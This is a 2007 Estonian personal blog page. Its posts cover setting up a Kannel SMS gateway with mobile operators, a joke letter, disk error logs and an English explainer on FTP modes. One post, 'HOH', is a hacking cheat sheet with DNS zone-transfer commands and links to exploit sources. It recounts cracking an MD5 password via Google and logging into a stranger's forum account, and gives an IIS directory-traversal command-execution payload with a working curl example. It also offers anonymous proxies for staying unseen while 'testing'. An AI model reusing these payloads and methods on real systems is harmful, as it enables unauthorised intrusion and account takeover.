margusja – Page 21 – Margus Roo

Kuidas ma SMS GW paigaldasin (Paigaldan)

Posted on February 15, 2007 - April 18, 2007 by margusja

11:30 15.02.2007 – Projekt sai alguse 2006 aasta suvel. Oli idee. Siit sealt sai uuritud kuidas asja teha ja üks mis kindel oli, et tuleb hankida sideametist number. Ok mis seal ikka teeme ära.
Aga polnud midagi et teed ära. Igatahes 2007.02.12 seisuga õnnestus lõpuks saada number ja aktiveerisin. Ma ei hakka siinkohal rääkima kui “turvaline” on kasutajanimi kujul eesnimi.perenimi ja sellesti siis genereeritud parool Perenimi+isikukoodi 3 esimest numbrit. Nii üks etapp on complited – number on olemas.

Edasi. SMS GW serveri softi valik. Silma jäi kannel http://www.kannel.org ja praeguse (15.02.2007) seisuga on plaan seda endilelt kasutada. Enne siiski kui päris installiks läheb üritan EMT-ga kordineerida selle tarkvara sobivust. Kõne EMT-sse ja umbes 30 minutine ajaraiskamine mille tulemusena minu probleem ja kontakt anti hetkel koolitusel olevale tehnikule. Jääme ootama.

16:33 15.02.2007 – Vahepeal oli keegi EMT-st helistanud. Kuid kuna ma hetkel vastata ei saanud, siis uuesti pole ka ühendust võetud. Ok Helistan uuesti EMT infoliinile seal kuulatakse kenasti ära ja saan seekord oma halduri. Kõne haldurile kes kuulab mind ka kenasti ära ja arvab et täna enam kedagi pädevat pole ja teeme siis homme.

15:14 16.02.2007 Homme on käes. EMTist tuli hull spec. Hirm hakkas seda lugedes. Jätsin pooleli ja asusin kannelt paigaldama. Müts maha FC ees. Kutidel oli pakis asi olemas. yumiga laks peale ja natsa konfimist ja asi tuli ülesse. Peale kanneli starti netstatsiga vaadates olid paar porti kuulama hakanud: wap-wsp ja wap-wsp-wtp. Nüüd hakkan kanneli manni lugema ehk saan aimu ka mida ma teen.
16:44 16.02.2007 Siiani läheb kenasti. Konfitud sms_servise ja fakesmsc-ga lastud 1000 testkirjet baasi. Esialgu mysql kuid päriskasutamiseks läheb kohe kindlasti PostgreSQL. Nüüd peab teisipäeva ootama, siis saab EMT-iga alustada lepingutegemist ja testliiklust proovida. Saab näha, lause lepingut sõlmima kõlab väga kauakestva protsessina.

11:40 20.02.2007 Kõne EMT infotelefonile ja uurisin et kuidas ma saan SMS lühinumbri edastamise teenuse lepingut sõlmida. Ok, ehk ei olnud minu sõnastus ka kõige õigem aga polnud hullu juba 15 minutilise mõttete vahetamise järel mõistsime me üksteist ja kohe sai selgeks et EMT-l ei ole hetkel seda inimest kes asjaga tegeleks ja paluti mul viisakalt kiri saata kellelegi 3. isikule. Saatsin. Vaatab mis edasi saab. Kunagi, kui kõigi kolme operaatoriga diil done siis teen väikse statistika ka kellega kiodas läks. Seniks aga… ootame vastust.

10:30 27.02.2007 – Kõne EMTsse. Infotädi ei saanud jälle aru mida ma tahan. Lõpuks suutsin selgeks teha et ma tahan kontakti astuda inimesega kes suudaks minuga teha lepingut sms lühinumbri edastamise peale. Üks inimene pidi olema aga seda ei ole. Teine inimene pidi teda asendama, aga seda ei saa ei mobla ega mailiga ega muud moodi kätte. Soovitati homme proovida. Palju õnne. Kaalun tõsiselt varianti et alustan mõnest teisest operaatorist.

11:23 28.02.2007 – Sain otsenumbri inimesele kes pidavat vastava teenuse juhti asendama. Kõne sellele inimesele. Selgus et inimene keda ta asendab on ka tagasi. Lubas surmkindlalt kohe tema juurde minna ja minu numbri anda. Ok ootame…

10:12 01.03.2007 – Praeguseks hetkeks ei ole keegi helistanud. Uus katse tootejuhti asendanud inimese numbrile. Ei miskit. Kõne infoliinile. Sealt prooviti kätte saada tootejuhti asendanud inimest. Vist saadi. infoteenindaja ütles et minuga võetakse kohe kindlasti täna ühendust. Kamaan! See on juba naljakas. Ootame siis… ma ei teagi mida egasi teha. Ei ole halb inimene aga tahestahtmata tahaks sellise asja suure kella otsa juba panna.

10:45 01.03.2007 – Sain maili EMT vastavalt tootejuhilt. Vahetame tehnilist infot. Asi susiseb lõpuks.

02.03.2007 – Susiseb ta jee. Imeb vilinal hoopis. Hommikul jälle kõne EMT-sse, ma isegi tean numbrit peast. Tootejuht olla kadunud. Keegi ei tea kus on. Ma siis laiutan käsi et mis saab, kamaan! Natsa kahju teenindajast ka, tema pole süüdi aga keegi peab selle venna kätte saama. Ok tädi proovis veel ja tulmus oli see et onu – tootejuht lubas mulle 15 minuti jooksul helistada. Helistas peaaegu 15 minuti jooksul. Lahe nüüd hakkab liikuma… ajame siis juttu ja et ikka lepingut vaja sõlmida. Onu lubas surmkindlalt mulle maili saata tänase päeva jooksul. Hetkel on 19:01 kell ja jee ta saatis. Kuna täna on reede siis palju õnne. Salaja pean plaani, et kui mul, rõhutan KUI õnnestub leping saada siis surkan neile selle blogi ette ehk saavad aru kui haige protsess see minu jaoks on. Ok ootame esmaspäeva. Aga muide!!! Mul on selle pagana tootejuhi mobla number 🙂

04.03.2007 – Hommikul telefonikõne otse vastava isiku mobiili sisse. Sealt tuli jälle hulga vabandavat juttu et ikka ei olnud aega jne… teate ikka väga nõutuks teeb! Mismoodi üks väikefirma peab endale sms teenuse edastamise lepingu saama!? Ok joppas lõunaks oli leping mailboxis. Juhuu!!! Selgus et EMT tahab liiklust üle IPSeci. Nummi polegi seda teinud! Noh siis teen. Igatahes leping läks meiepoolel ülevaatamisse ja liidan et homme rändab EMT-sse tagasi.

15.03.2007 – Nii, vaheleal selgus et ainult linuxi vahe ei saa asja teha. EMTi soovitusel sai ostetud Linksysi VPN/IPSec purk. Nii Ull hakkas seda konfima. Siis selgus et EMTist on puudu nendepoolne subnet ja netmask. Seda küsides EMT-i kutid ei osanud miskit ütelda ja lubasid helistada… saab näha.

23.03.2007 – EMT imeb sajaga!!! Kuna emti pool on kaks erinevat IP-d vaja tunneldada, samas EMTi kutid soovitasid mul osta seadme mis toetab ühte VPN tunnelit siis palju õnne. Üritasin kogu C klassi tunneldada millegipärast ei õnnestunud. Lõpuks lasime EMTi IPSec venna enda peale see siis “konfis” tegi ühe tunneli meie IP ja nende SMSC kuulava pordi peale. Teatas mulle siis et kõik timm anna minna. Sain neilt ka kasutaja ja parooli et saaks siis replay sms-e saata. Ok konfin nagu segane ei miskit sisse ei tule kottigi. Ja ei saagi tulla! Teist tunnelit EMTi SMSC saatva IP pealt polegi meie SMSGW-sse. Ei see on ikka haige. Tagatipuks anti valed kasutajanimed ja paroolid ka alguses mida ma oma paar tundi üritasin käima saada enne kui lõpuks hakkasin logi uurima et mis jama on. Kõne jälle EMTi ja persetäis vabandusi sealtpoolt ja sain sealt siis õige kasutajanime ja parooli. Ei ole olemas!!! Selline koblakas on! Igatahes täna on suur päev ma saan oma SMS GW-s saata sõnumeid välja EMTi SMSC kaudu. Esmaspäeval siis sitemal juhul uus VPN IPSec purk.

27.03.2007 No ei ole võimalik. Mingil hetkel oleks pealtnägijale lahe lugu aga nüüd on see juba sinna ka liiga räige. EMT kutt lõpuks teatas et sorry, purk mida me soovitasime siiski ei sobi. Ostke nüüd uus. Türa!!! Fuck!!! kas seda ennem ei saanud tunnistada!!! No ei ole võimalik!!! Vot sulle parimat kvaliteeti!!!

03.04.2207 Märkamatult on käes uus kuu. Omandasime vahepeal uue VPN purgi millega saab teha kuni 50 IPSec kanalit, et ikka oleks. EMT pool konfis selle taas kord ära. Ok proovime siis testida ja ikka ei toimi. Segadust kui palju. Kas probleem on tunnelis? EMT pool? Või meie pool? Siinkohal müts maha EMT pool Jani ees kes aitas palju debaagida ja selgus et minu poolt kannelis natukene portide tõlgendamisega mööda pandud. See viga parandatud ja asi hakkas kohe liikuma. Nii et selleks hetkeks EMTiga ok.

Mis siis EMT asja kohta ütelda. Ma ei tea kas see teenus on alles nii noor või mis aga oleks oodanud natukene kindlamat suhtumist neilt. Ok aga mis siin enam.

Helistasin ka Elisasse ja tele2-hte. Elisa omad lubasid vastata ühe tööpäeva jooksul ja tele2 soovis et ma kirja saadan. Seda ma siis tegin. Ootame siis.

18.04.2007 – Sorry, vahepeal oli hullar. Hetkeseisuga on Elisa ja Tele2 ka kannelis sees. Aega võtsid mõlemad kokku ehk 10 minutit. Ex endal ka kogemust rohkem ja polnud seda VPN-i vahel.
—
Jätkub…

HOH

Posted on February 13, 2007 - February 15, 2007 by margusja

http://retrogod.altervista.org/GHDB.TXT

Info saamine on väga oluline. Kui me räägime domeenidest siis mitte käsureal ennast väga mugavatele inimestele siin paar abiks saiti. Teine hea omdus on neil ehk ka see, et te ei pea “testimise” ajal leidma mingit proxyt mis on teadagi suht aeglane.Internet Assigned Number Autority – http://www.iana.com Siin saab root domeenide kohta infot. Näiteks .ee domeen http://www.iana.com/root-whois/ee.htm

www.dnsstuff.com – Erinevaid web based toole DNS kirjete jaoks.
http://www.ip-plus.net/tools/tools.en.html – siin saab vabalt axfr NS päringuid teha ilma et ise silma paistaks.
host -t axfr gov.uk [ns server] annab antud domeeni all asuvad saidid.

whois on power tool. Tasub silmas pidada et whois NIMI ja whois IP annavad totaalselt erinevad tulemused. Näiteks aadressiruumi saab just whois IP järgi inetnum kirje sees. See vahemik scanneriga võib anda päris huvitavaid tulemusi.
http://sec.angrypacket.com/code/blindcrawl.pl – hea script hostide nimede testimiseks.

NSTX ja IODINE ip over DNS – päris abix tasuta interneti loomiseks.

Cryptitud admed näiteks paroolifailid – Väike test. Teisendame seks md5 kujule (md5 online või teie oma md5 func) ja saame 1af946f0cd9c9568b26a40a705c3df7c see tulemus omakorda googlesse ja esimene tulemus on:SeniorSite v.1.4.1[SSUser]: loaded user (login: petermc, pass: 1af946f0cd9c9568b26a40a705c3df7c, id: 809, auth: , fullname: Peter MC, email: petermc@skizoklan.dkactivated: …
Siinkohal ei hakka urli mina tooma aga urlile minnes paistis sealt mingi foorum kuhu sai kenasti sisse petermc ja seks. Mis point on? Isegi cryptitud andmeid ei tohiks lohakalt hoida.

www.netcraft.com – veebiserveri kohta korralikult infot.nmap -sV Võti on oluline, sest siis näeb reaalseid teenuseid mis portides jooksevad.

openssl-too-open http://www.phreedom.org/solar/exploits/apache-openssl/

—
http://www.zone-h.org/ – Päris hea online list maha võetud saitidest ja kuidas võeti.
www.proxy4free.com – avalikud proxy (high anonymity)

rootkit –
port knocking
www.mikx.de – dude otsib brauserite auke.
kmod ptrace

..%255c..\\winnt\\system32\\cmd.exe?/c%20dir

curl “http://192.168.10.149/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255c\\winnt\\system32\\cmd.exe?/c%20type%20\\Inetpub\\Flightlist\\Flightlist.txt”

IISI peal failinime l6ppu +.htr

ettercap fun filter

paroolide cryptimine john paroolifail õigel kujul ette.

Huvitavaid tulemusi saab googlest erinevaid failityype otsides näiteks inc paljud progejad incluudivad sedatyypi faile. samas neid otse küsides veebiserver annab source koodi.

Jess! Talvine hyppamine

Posted on February 13, 2007 - February 13, 2007 by margusja

Eesti langevarjuri jaoks on talvel hyppamine p2ris m6nus asi. http://video.slk.ee/2007/SLK-7-Veebr_0001.wmv

SLK piltide convertimise hindid

Posted on February 4, 2007 by margusja

export PGCLIENTENCODING=latin
/var/www/slk.ee/vhosts/www/htdocs/admin/pimport.pl id pic_path

Protected: Nuu nuu!

Posted on February 3, 2007 - February 22, 2007 by margusja

Office::mac errorid ja lahendus

Posted on January 26, 2007 by margusja

An unexepted error occured while trying to load the Microsoft Framework library – Exeli, Wordi ja Poverpoindi käivitamisel.
This identify cannot be opened with this version of Endurage – Endurage käivitamisel.
Lahendus – Documents – Microsoft User Data renameda ja uuesti proovida.

Noku Palgatõusu Taotlus

Posted on January 18, 2007 by margusja

Mina, Noku, taotlen käesolevaga palgakõrgendust järgnevatel põhjustel:

1. Teen füüsilist tööd.
2. Töötan suurtes sügavustes
3. Sukeldun pea ees oma töösse
4. Nädalavahetused ja pühad pole mul puhkepäevad
5. Töötan niiskes keskkonnas
6. Ületundide eest mulle ei maksta
7. Töötan pimedal töökohal, kus ventilatsioon praktiliselt puudub
8. Töötan kõrgete temperatuuride juures
9. Oma töö tõttu satun haigustesse ja nakatumise ohtu

Lugupeetud Noku,

Pärast Teie poolt esitatud avalduse läbitöötamist jõudis juhtkond otsusele
Teie taotlusele negatiivselt vastata järgmistel põhjustel:

1. Te ei tööta kunagi 8 tundi
2. Te jääte pärast lühikest tööaega kohe magama
3. Te ei tööta alati seal, kus ette nähtud, vaid viibite muudes ka
piirkondades
4. Te ei haara initsiatiivi, vaid Teile tuleb survet avaldada ning Teid
tuleb sõbralikult kohelda, et Te üldse tööle hakkaksite
5. Pärast töökohalt lahkumist jätate selle küllaltki mustaks
6. Te ei pea alati kinni töö-ohutuseeskirjadest, näiteks
kaitseriietuse kandmine
7. Te lähete pensionile oluliselt varem kui 65-aastaselt
8. Te ei saa kahes vahetuses korraga töötada
9. Te lahkute mõnikord ettenähtud töökohalt ilma, et oleks tööga valmis
saanud

Lisaks eelnenule, mis on juba piisavalt negatiivne, oleme Teid pidevalt
näinud töökohalt lahkumas koos kahe väga kahtlase välimusega kotiga.

Dammit, kuradi vint raisk…

Posted on January 15, 2007 by margusja

Jan 15 18:49:20 juhe kernel: ata1: command 0x25 timeout, stat 0xd0 host_stat 0x21
Jan 15 18:49:20 juhe kernel: ata1: status=0xd0 { Busy }
Jan 15 18:49:20 juhe kernel: SCSI error : <0 0 0 0> return code = 0x8000002
Jan 15 18:49:20 juhe kernel: EOM ILI Current sda: sense = 70 69
Jan 15 18:49:20 juhe kernel: ASC=62 ASCQ=61
Jan 15 18:49:20 juhe kernel: end_request: I/O error, dev sda, sector 155
Jan 15 18:49:20 juhe kernel: Buffer I/O error on device sda1, logical block 23
Jan 15 18:49:20 juhe kernel: ATA: abnormal status 0xD0 on port 0xEC07

Ex n22b mis saab.

Lihtsalt üks desktopi pilt

Posted on November 26, 2006 - November 26, 2006 by margusja

Ma ei tea mis kiiks on aga vahel harva tuleb isu oma desciga eputada. Sooooryyyyy.

Orininaalsuuruses siin

FTP active and passive modes

Posted on November 23, 2006 by margusja

FTP is a TCP based service exclusively. There is no UDP component to FTP. FTP is an unusual service in that it utilizes two ports, a ‘data’ port and a ‘command’ port (also known as the control port). Traditionally these are port 21 for the command port and port 20 for the data port. The confusion begins however, when we find that depending on the mode, the data port is not always on port 20.

Active FTP

In active mode FTP the client connects from a random unprivileged port (N > 1023) to the FTP server’s command port, port 21. Then, the client starts listening to port N+1 and sends the FTP command PORT N+1 to the FTP server. The server will then connect back to the client’s specified data port from its local data port, which is port 20.

From the server-side firewall’s standpoint, to support active mode FTP the following communication channels need to be opened:
FTP server’s port 21 from anywhere (Client initiates connection)
FTP server’s port 21 to ports > 1023 (Server responds to client’s control port)
FTP server’s port 20 to ports > 1023 (Server initiates data connection to client’s data port)
FTP server’s port 20 from ports > 1023 (Client sends ACKs to server’s data port)

Passive FTP

In order to resolve the issue of the server initiating the connection to the client a different method for FTP connections was developed. This was known as passive mode, or PASV, after the command used by the client to tell the server it is in passive mode.

In passive mode FTP the client initiates both connections to the server, solving the problem of firewalls filtering the incoming data port connection to the client from the server. When opening an FTP connection, the client opens two random unprivileged ports locally (N > 1023 and N+1). The first port contacts the server on port 21, but instead of then issuing a PORT command and allowing the server to connect back to its data port, the client will issue the PASV command. The result of this is that the server then opens a random unprivileged port (P > 1023) and sends the PORT P command back to the client. The client then initiates the connection from port N+1 to port P on the server to transfer data.

From the server-side firewall’s standpoint, to support passive mode FTP the following communication channels need to be opened:
FTP server’s port 21 from anywhere (Client initiates connection)
FTP server’s port 21 to ports > 1023 (Server responds to client’s control port)
FTP server’s ports > 1023 from anywhere (Client initiates data connection to random port specified by server)
FTP server’s ports > 1023 to remote ports > 1023 (Server sends ACKs (and data) to client’s data port)

Summary

The following chart should help admins remember how each FTP mode works:
Active FTP :
command : client >1023 -> server 21
data : client >1023 <- server 20 Passive FTP : command : client >1023 -> server 21
data : client >1023 -> server >1023

A quick summary of the pros and cons of active vs. passive FTP is also in order:

Active FTP is beneficial to the FTP server admin, but detrimental to the client side admin. The FTP server attempts to make connections to random high ports on the client, which would almost certainly be blocked by a firewall on the client side. Passive FTP is beneficial to the client, but detrimental to the FTP server admin. The client will make both connections to the server, but one of them will be to a random high port, which would almost certainly be blocked by a firewall on the server side.

Luckily, there is somewhat of a compromise. Since admins running FTP servers will need to make their servers accessible to the greatest number of clients, they will almost certainly need to support passive FTP. The exposure of high level ports on the server can be minimized by specifying a limited port range for the FTP server to use. Thus, everything except for this range of ports can be firewalled on the server side. While this doesn’t eliminate all risk to the server, it decreases it tremendously.